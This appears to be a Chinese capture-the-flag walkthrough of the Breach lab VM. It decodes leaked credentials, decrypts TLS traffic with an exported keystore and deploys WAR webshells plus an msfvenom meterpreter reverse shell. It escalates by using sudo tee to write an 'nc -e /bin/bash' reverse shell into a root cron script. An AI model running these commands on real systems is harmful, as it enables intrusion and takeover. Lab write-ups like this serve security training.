Breach靶场
1.环境准备
breach:192.168.110.140
kali:192.168.110.129
2.攻击过程
1.端口扫描
发现所有端口都差不多打开,可能布置蜜罐之类的假端口
我们直接访问80端口,192.168.110.140:80
查看网页源码,发现有一串类似base64编码的字符串 Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo
打开burpsuite编码模块,解码查看一下,通过两次解码发现出现一个可能是账号密码(pgibbons:damnitfeel
g
o
o
d
t
o
b
e
a
g
a
n
g
goodtobeagang
goodtobeagangta)
然后发现网页中的图片存在超链接,点开查看跳转如下:
再次查看源码发现一行提示,可能和email有关
将几个链接都点一点发现三张图片,和一个impresscms的登录页面,此时我们想到第一次获得的账号密码是否可以登录这个impresscms
尝试使用账号密码登录一下,发现真的可以登录进去
进去之后查看发现里面有什么信息线索,发现在Inbox中有三个邮件,查看是否是email的一些什么信息
把信息点开查看一下内容
第一封:Peter,是的,我将不得不继续要求你的团队只将任何敏感项目发布到管理门户。我的密码非常安全。如果你能继续告诉他们这一切,那就太好了。-比尔
第二封:我从上周在Chotchkie’s的欢乐时光遇到的供应商那里获得了IDS / IPS系统的一笔非常好的交易!
第三封:彼得,我不确定这是什么。我在这里保存了文件: 192.168.110.140/.keystore Bob ------------------------------------------------------------------------------------------------------------------------------------------- 来自: registrar@penetrode.com 发送时间: 02 June 2016 16:16 To: bob@initech.com;admin@breach.local 主题:感谢您购买超级秘密证书专业版!请找到附加您的新 SSL 证书。不要与任何人分享!
发现在192.168.110.140/.keystore中存储了一个文件,我们打开下载一下这个文件
再点别的发现在View Account中content中有一个可以点的链接点开看看
发现有一个pcap的wireshark的流量包可以下载
下载下来这个包。
使用wireshark打开这个流量包,发现这个流量包是使用SSL加密后的
而且发现所有的账号密码都是tomcat
使用keytool将keystore密钥库中的.p12证书导出
keytool -importkeystore -srckeystore keystore -destkeystore tomcatkeystore.p12 -deststoretype pkcs12 -srcalias tomcat
在将证书导入到wireshark中去,Wireshark>编辑>首选项>Protocols>TLS
将.p12证书导入到wireshark中
随后一些TLS会变成http,我们过滤一下查看http中的
查看到一个url,我们访问一下看看,发现无法访问
https://192.168.110.140:8443/_M@nag3Me/html
我们使用burpsuite开启代理再访问一下查看,此时出现一个html/basic的登录
这里发现在wireshark中已经解出了账号密码了
Credentials: tomcat:Tt\5D8F(#!*u=G)4m7zB
成功登录到Apache后台
Get Shell
1.菜刀一句话木马
Tomcat后台get shell是有标准姿势的,将caidao.jsp压缩成caidao.zip压缩包,再将zip压缩包将扩展名改为caidao.war,将war包上传部署即可:
菜刀链接失败, 发现的问题:上传的菜刀马,一会儿就会消失,文件被删除,需要重新上传war包才能够继续使用菜刀,主机可能有杀软或者杀web shell工具。解决方法:bash反弹一个shell出来
2.使用msf生产一个反弹shell
msf生成一个war格式的反弹shell
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.129 lport=6666 -f war -o test.war
将test.war上传上去
使用msf开启监听,use exploit/multi/hander
运行之后访问test文件
python -c 'import pty;pty.spawn("/bin/bash")',命令行形式
提权
拿到shell之后,接下来便是提权了,收集主机信息,发现没有内核提权,在/etc/passwd发现milton 和 blumbergh用户
在网站发现如下内容
查看内容发现数据库,后续我们登录数据库查看一下有什么内容
进入数据库查看内容
查看user表中的内容,发现有一个milton的账号和密码
密码是使用md5编码的,我们使用somd5网页解密一下,
解出来的密码:thelaststraw
进入milton查看是否有root权限发现没有,查看历史命令,发现提权到blumbergh,需要密码
在http://192.168.110.140/images/目录下发现六张图片
将图片复制到kali linux,使用strings打印各图片其中的可打印字符,追加输出到images.txt,在vim下查看,密码在bill.png图片中,密码为coffeestains
登录blumbergh:coffeestains
发现两个可以用root权限执行的文件tee和tidyup.sh,
查看历史文件,发现一个cleanup,进去查看
发现果然有一个tidyup.sh,查看内容是什么
查看到这是一个每三分钟就会自动执行的清理文件,因此上传菜刀的shell三分钟后会被杀掉
还有一个tee是可以将一个文件写入另一个文件的命令
向tidyup.sh中写入反弹shell命令
tidyup.sh文件只有root可写,而能够以root权限运行tee命令,那么用tee命令写tidyup.sh:先将反弹shell命令写入shell.txt文件,使用bash反弹shell命令没有成功,于是使用nc命令反弹shell成功,所以写nc反弹命令:
echo “nc -e /bin/bash 192.168.110.5 5555” > shell.txt
再使用tee命令将shell.txt内容输出到tidyup.sh
cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
查看tidyup.sh文件写入成功:
cat /usr/share/cleanup/tidyup.sh
经测试发现,只有在/home/blumbergh这个用户的目录下,才可以执行这三行命令,其余目录都提示没有执行权限,而且在切换账户时得加上su -。
su命令和su -命令区别:
su只是切换了root身份,但Shell环境仍然是普通用户的Shell;而su -连用户和Shell环境一起切换成root身份了。
1125
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
